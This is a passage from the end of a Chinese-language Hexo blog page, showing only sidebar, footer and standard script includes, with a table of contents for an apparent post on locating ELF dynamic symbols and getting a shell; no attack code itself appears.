            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Ic3makr" target="_blank" title="github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  github
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#正文"><span class="nav-number">2.</span> <span class="nav-text">正文</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x0_说明"><span class="nav-number">2.1.</span> <span class="nav-text">0x0 说明</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x1_寻找ELF文件动态加载的基址"><span class="nav-number">2.2.</span> <span class="nav-text">0x1 寻找ELF文件动态加载的基址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02_寻找DYNAMIC段"><span class="nav-number">2.3.</span> <span class="nav-text">0x02 寻找DYNAMIC段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03_寻找动态链接符号表(-dynsym)和动态链接字符串表(-dynstr)"><span class="nav-number">2.4.</span> <span class="nav-text">0x03 寻找动态链接符号表(.dynsym)和动态链接字符串表(.dynstr)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04"><span class="nav-number">2.5.</span> <span class="nav-text">0x04</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#代码"><span class="nav-number">3.</span> <span class="nav-text">代码</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#get_shell"><span class="nav-number">3.1.</span> <span class="nav-text">get shell</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Reference"><span class="nav-number">4.</span> <span class="nav-text">Reference</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Icemakr</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"0byjwzsf"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  

  

  

  

</body>
</html>
